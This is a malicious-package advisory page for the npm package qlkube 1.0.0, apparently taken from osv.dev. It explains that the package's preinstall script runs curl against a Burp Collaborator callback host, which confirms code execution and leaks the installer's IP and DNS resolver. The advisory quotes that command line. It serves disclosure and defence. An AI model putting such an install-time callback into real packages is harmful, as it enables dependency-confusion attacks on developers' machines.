npm

qlkube @1.0.0

Vulnerability report · Last retrieved from osv.dev July 10, 2026 at 1:30 AM UTC

Malicious

OSV ID

MAL-2026-10016

Ecosystem

npm

Summary

The package's package.json declares a preinstall lifecycle script that runs curl https://cwcie03pzedo62twgbs3x6e9l0rsfk39.oastify.com on npm install . The destination is a Burp Suite Collaborator subdomain used for out-of-band interaction confirmation; contacting it on install confirms code execution on the installer's machine and leaks the installer's public IP and DNS resolver via the OOB callback. The package has no legitimate functionality (index.js is a stub), consistent with a dependency-confusion probe or targeted exploitation payload against an internal package name.

Source: amazon-inspector (51bbdab9d33c291290e2f871acd2ebf7bf64c2c66c5124592055669771b6301e)

Protect your entire dependency tree

Scan your lock files automatically on every PR. Block malicious packages before they reach production.